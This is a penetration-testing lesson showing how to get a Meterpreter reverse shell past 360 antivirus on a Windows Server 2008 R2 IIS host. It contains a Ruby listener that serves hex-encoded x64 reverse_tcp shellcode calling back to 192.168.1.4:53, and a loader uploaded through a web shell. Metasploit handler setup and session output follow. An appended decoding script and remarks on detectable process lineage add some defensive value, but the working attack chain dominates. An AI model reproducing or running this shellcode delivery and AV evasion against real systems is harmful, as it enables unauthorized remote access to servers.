Attacker: 192.168.1.4, Debian
Target: 192.168.1.2, Windows Server 2008 R2 (x64)

Installed on the target: 360 Safeguard (360卫士) + 360 Antivirus (360杀毒). Both are running during the test: 360Tray.exe, 360sd.exe, ZhuDongFangYu.exe and 360rp.exe all appear in the task list below.

    [*] Disk list [ C:D:E: ]
    C:\inetpub\wwwroot\> tasklist

    Image Name                 PID  Session Name  Session#   Mem Usage
    ========================= ===== ============= ========= ===========
    System Idle Process           0                       0        24 K
    System                        4                       0       372 K
    smss.exe                    236                       0       956 K
    csrss.exe                   324                       0     5,572 K
    csrss.exe                   364                       1    14,452 K
    wininit.exe                 372                       0     4,508 K
    winlogon.exe                408                       1     5,364 K
    services.exe                468                       0     7,376 K
    lsass.exe                   476                       0     9,896 K
    lsm.exe                     484                       0     3,876 K
    svchost.exe                 576                       0     8,684 K
    vmacthlp.exe                632                       0     3,784 K
    svchost.exe                 676                       0     7,384 K
    svchost.exe                 764                       0    12,716 K
    svchost.exe                 800                       0    29,792 K
    svchost.exe                 848                       0    11,248 K
    svchost.exe                 900                       0     9,308 K
    svchost.exe                 940                       0    16,184 K
    svchost.exe                 332                       0    11,800 K
    spoolsv.exe                 548                       0    15,568 K
    svchost.exe                1052                       0     8,228 K
    svchost.exe                1076                       0     8,808 K
    svchost.exe                1144                       0     2,576 K
    VGAuthService.exe          1216                       0    10,360 K
    vmtoolsd.exe               1300                       0    18,068 K
    ManagementAgentHost.exe    1332                       0     8,844 K
    svchost.exe                1368                       0    11,884 K
    WmiPrvSE.exe               1768                       0    13,016 K
    dllhost.exe                1848                       0    11,224 K
    msdtc.exe                  1940                       0     7,736 K
    WmiPrvSE.exe               1440                       0    19,768 K
    mscorsvw.exe                296                       0     4,732 K
    mscorsvw.exe                584                       0     5,088 K
    sppsvc.exe                 1476                       0     8,408 K
    taskhost.exe               2612                       1     6,344 K
    dwm.exe                    2868                       1     4,604 K
    explorer.exe               2896                       1    44,912 K
    vmtoolsd.exe               3008                       1    17,744 K
    TrustedInstaller.exe       2268                       0    15,776 K
    360Tray.exe                2684                       1     6,056 K
    360sd.exe                  2636                       1     1,316 K
    ZhuDongFangYu.exe          2456                       0    14,292 K
    360rp.exe                  1712                       1    27,072 K
    SoftMgrLite.exe             864                       1    16,816 K
    w3wp.exe                   3300                       0    42,836 K
    svchost.exe                3840                       0     4,584 K
    notepad.exe                3712                       1     5,772 K
    cmd.exe                    3384                       0     2,376 K
    conhost.exe                3520                       0     3,420 K
    tasklist.exe               3096                       0     5,276 K

Lesson 92: Payload Usage in Practice - Figure 1

    C:\> dir
     Volume in drive C has no label.
     Volume Serial Number is C6F89BAB

     Directory of C:\

    2017/12/13  03:28    <DIR>          inetpub
    2009/07/14  11:20    <DIR>          PerfLogs
    2017/12/13  03:28    <DIR>          Program Files
    2019/01/23  14:09    <DIR>          Program Files (x86)
    2019/01/23  14:15    <DIR>          Users
    2017/12/13  03:25    <DIR>          Windows
                   0 File(s)              0 bytes
                   6 Dir(s)  21,387,132,928 bytes free

Lesson 92: Payload Usage in Practice - Figure 2

The target is 64-bit Windows Server 2008 R2 (kernel version 6.1, build 7600; sysinfo confirms this later):

    C:\> ver
    Microsoft Windows [Version 6.1.7600]

Lesson 92: Payload Usage in Practice - Figure 3

Configure the payload (a small Ruby TCP listener that hands the hex-encoded shellcode to whoever connects):

    root@John:/var/www/html# cat ./Micropoor_rev.rb
    require 'socket'

    if ARGV.empty?
      puts "Usage:"
      puts "Micropoor_rev.rb port"
      exit
    end

    PORT = ARGV.first.to_i

    # Hex-encoded windows/x64/meterpreter/reverse_tcp stager that calls back to the
    # handler on 192.168.1.4:53. The loader on the target reads this text from the
    # socket, decodes it and runs it, so the shellcode itself is served at run time
    # rather than shipped inside Micropoor_shellcode_x64.exe.
    SHELLCODE_HEX =
      "4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f74" \
      "8315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a552" \
      "2ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6" \
      "c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a6" \
      "0baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec7" \
      "83e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b92663" \
      "85ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17" \
      "c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dcc" \
      "ee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3" \
      "299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa8467" \
      "6ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7" \
      "637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeec" \
      "e09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa" \
      "5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a289" \
      "08e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7"

    # One client = one delivery: write the hex text and hang up.
    def handle_connection(client)
      puts "Payload is on-line #{client}"
      client.write(SHELLCODE_HEX)
      client.close
    end

    socket = TCPServer.new('0.0.0.0', PORT)
    puts "Listening on #{PORT}. "
    while client = socket.accept
      Thread.new { handle_connection(client) }
    end
    root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080
    Listening on 8080.
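As an added example, not part of the original lesson or of Micropoor's tooling, the following Ruby script takes the hex text served above (copied verbatim from the listing) and does what a defender who captured the 8080 stream would do with it: it recognises Metasploit's x64/xor decoder stub at the front of the blob, reads the 8-byte XOR key and the block count straight out of the stub's instruction immediates, decodes the body statically, and checks that the result begins with the x64 Metasploit stager prologue (cld; and rsp,-16; call). The stub layout and the prologue bytes are Metasploit's; the constant and function names are this example's own.

```ruby
# Added example: statically decode the hex blob served by Micropoor_rev.rb.
# Not part of the original lesson or of Micropoor's tooling. SERVED_HEX is the
# hex text from the listing above, copied verbatim; the stub layout and the
# stager prologue bytes are Metasploit's (modules/encoders/x64/xor.rb and the
# windows/x64 block_api stager); the function names are this example's own.
SERVED_HEX = %w[
  4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f74
  8315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a552
  2ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6
  c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a6
  0baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec7
  83e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b92663
  85ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17
  c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dcc
  ee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3
  299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa8467
  6ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7
  637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeec
  e09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa
  5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a289
  08e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7
].join.freeze

# Metasploit x64/xor decoder stub, 0x27 = 39 bytes:
#   48 31 c9                xor  rcx, rcx
#   48 81 e9 <imm32>        sub  rcx, imm32        ; imm32 = -block_count
#   48 8d 05 ef ff ff ff    lea  rax, [rip-0x11]   ; rax = start of stub
#   48 bb <8-byte key>      mov  rbx, key
#   48 31 58 27             xor  [rax+0x27], rbx   ; 0x27 = stub length
#   48 2d f8 ff ff ff       sub  rax, -8
#   e2 f4                   loop                   ; back to the xor
STUB_LEN = 0x27

# First bytes of every x64 Metasploit block_api stager: cld; and rsp,-16; call
STAGER_PROLOGUE = "\xfc\x48\x83\xe4\xf0\xe8".b

# Hex text -> bytes. Reject odd-length or non-hex input instead of decoding garbage.
def hex_to_bytes(hex)
  raise ArgumentError, "not an even-length hex string" unless hex =~ /\A(?:[0-9a-fA-F]{2})+\z/
  [hex].pack("H*")
end

# Match the fixed bytes of the stub and pull the two variable fields out of
# the instruction immediates. Returns nil if this is not the x64/xor stub.
def parse_x64_xor_stub(buf)
  return nil unless buf.bytesize >= STUB_LEN
  fixed = { 0 => "\x48\x31\xc9", 3 => "\x48\x81\xe9", 10 => "\x48\x8d\x05\xef\xff\xff\xff",
            17 => "\x48\xbb", 27 => "\x48\x31\x58\x27", 31 => "\x48\x2d\xf8\xff\xff\xff",
            37 => "\xe2\xf4" }
  return nil unless fixed.all? { |off, bytes| buf[off, bytes.bytesize] == bytes.b }
  { key: buf[19, 8], block_count: -buf[6, 4].unpack1("l<") }
end

# Undo `xor [rax+0x27], rbx` over block_count qwords: both the memory operand
# and rbx are little-endian, so byte i of each block is XORed with key byte i.
def decode_x64_xor(buf, stub)
  key = stub[:key].bytes
  body = buf[STUB_LEN, stub[:block_count] * 8]
  body.bytes.each_with_index.map { |b, i| b ^ key[i % 8] }.pack("C*")
end

def analyse_served_payload(hex)
  buf  = hex_to_bytes(hex)
  stub = parse_x64_xor_stub(buf)
  return { encoder: :unknown, size: buf.bytesize } if stub.nil?
  decoded = decode_x64_xor(buf, stub)
  {
    encoder: :x64_xor,
    size: buf.bytesize,
    expected_size: STUB_LEN + stub[:block_count] * 8,   # stub + encoded body
    key_hex: stub[:key].unpack1("H*"),
    block_count: stub[:block_count],
    decoded_prefix_hex: decoded[0, 16].unpack1("H*"),
    looks_like_msf_x64_stager: decoded.start_with?(STAGER_PROLOGUE),
  }
end

if $PROGRAM_NAME == __FILE__
  analyse_served_payload(SERVED_HEX).each { |k, v| puts "#{k}: #{v}" }
end
```

Run it directly and it reports the encoder, the key, the block count, whether the blob's length matches what the stub claims, and whether the decoded bytes start like a Metasploit x64 stager. The point for the operator is the flip side of this delivery design: serving the shellcode as plain text over TCP keeps it out of the uploaded EXE, but the decoder stub is a fixed byte pattern and the key travels in the same stream, so anyone holding a capture of the 8080 connection recovers the stager (and its LHOST/LPORT) in a few lines.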

Lesson 92: Payload Usage in Practice - Figure 4

Upload Micropoor_shellcode_x64.exe (the loader that fetches the hex shellcode from the Ruby listener) to the webroot, C:\inetpub\wwwroot\.

Lesson 92: Payload Usage in Practice - Figure 5

Configure msf (the handler's payload type, LHOST and LPORT must match what the stager was generated with, here windows/x64/meterpreter/reverse_tcp on 192.168.1.4:53):

    msf exploit(multi/handler) > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf exploit(multi/handler) > show options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------


    Payload options (windows/x64/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
       LPORT     53               yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target


    msf exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 192.168.1.4:53

Lesson 92: Payload Usage in Practice - Figure 6

Run it on the target:

Lesson 92: Payload Usage in Practice - Figure 7

    msf exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 192.168.1.4:53
    [*] Sending stage (206403 bytes) to 192.168.1.2
    [*] Meterpreter session 6 opened (192.168.1.4:53 -> 192.168.1.2:49744) at 2019-01-23 01:29:00 -0500

    meterpreter > getuid
    Server username: IIS APPPOOL\DefaultAppPool
    meterpreter > sysinfo
    Computer        : WIN5BMI9HGC42S
    OS              : Windows 2008 R2 (Build 7600).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x64/windows
    meterpreter > ipconfig

    Interface  1
    ============
    Name         : Software Loopback Interface 1
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 4294967295
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


    Interface 11
    ============
    Name         : Intel(R) PRO/1000 MT Network Connection
    Hardware MAC : 00:0c:29:bc:0d:5c
    MTU          : 1500
    IPv4 Address : 192.168.1.2
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : fe80::5582:70c8:a5a8:8223
    IPv6 Netmask : ffff:ffff:ffff:ffff::

Lesson 92: Payload Usage in Practice - Figure 8

    meterpreter > ps

    Process List
    ============

     PID   PPID  Name                         Arch  Session  User                        Path
     ---   ----  ----                         ----  -------  ----                        ----
     0     0     [System Process]
     4     0     System
     236   4     smss.exe
     296   468   mscorsvw.exe
     324   316   csrss.exe
     332   468   svchost.exe
     364   356   csrss.exe
     372   316   wininit.exe
     408   356   winlogon.exe
     468   372   services.exe
     476   372   lsass.exe
     484   372   lsm.exe
     548   468   spoolsv.exe
     576   468   svchost.exe
     584   468   mscorsvw.exe
     632   468   vmacthlp.exe
     676   468   svchost.exe
     764   468   svchost.exe
     800   468   svchost.exe
     848   468   svchost.exe
     864   2684  SoftMgrLite.exe
     900   468   svchost.exe
     940   468   svchost.exe
     1052  468   svchost.exe
     1076  468   svchost.exe
     1144  468   svchost.exe
     1216  468   VGAuthService.exe
     1300  468   vmtoolsd.exe
     1332  468   ManagementAgentHost.exe
     1368  468   svchost.exe
     1440  576   WmiPrvSE.exe
     1476  468   sppsvc.exe
     1712  2636  360rp.exe
     1768  576   WmiPrvSE.exe
     1848  468   dllhost.exe
     1940  468   msdtc.exe
     2456  468   ZhuDongFangYu.exe
     2612  468   taskhost.exe
     2636  1096  360sd.exe
     2684  1096  360Tray.exe
     2788  3408  Micropoor_shellcode_x64.exe  x64   0        IIS APPPOOL\DefaultAppPool  C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
     2868  900   dwm.exe
     2896  2852  explorer.exe
     3008  2896  vmtoolsd.exe
     3196  468   svchost.exe
     3300  1368  w3wp.exe                     x64   0        IIS APPPOOL\DefaultAppPool  c:\windows\system32\inetsrv\w3wp.exe
     3408  3300  cmd.exe                      x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\cmd.exe
     3712  2896  notepad.exe
     4092  324   conhost.exe                  x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\conhost.exe

    meterpreter >

Two things to read off this listing. First, Arch, Session, User and Path are only filled in for the processes the current token can open, which is exactly the IIS APPPOOL\DefaultAppPool tree; the session came in through the web shell, so it has app-pool privileges and nothing more until they are escalated. Second, the parent chain w3wp.exe (3300) -> cmd.exe (3408) -> Micropoor_shellcode_x64.exe (2788), a binary executed out of C:\inetpub\wwwroot\, is precisely the kind of process lineage an EDR or Sysmon rule would flag, even though the 360 processes (360Tray.exe, 360sd.exe, ZhuDongFangYu.exe, 360rp.exe) kept running next to it without intervening.

Lesson 92: Payload Usage in Practice - Figure 9

On the target:

Lesson 92: Payload Usage in Practice - Figure 10

Appendix:

Micropoor_shellcode for payload backdoor

https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html

Micropoor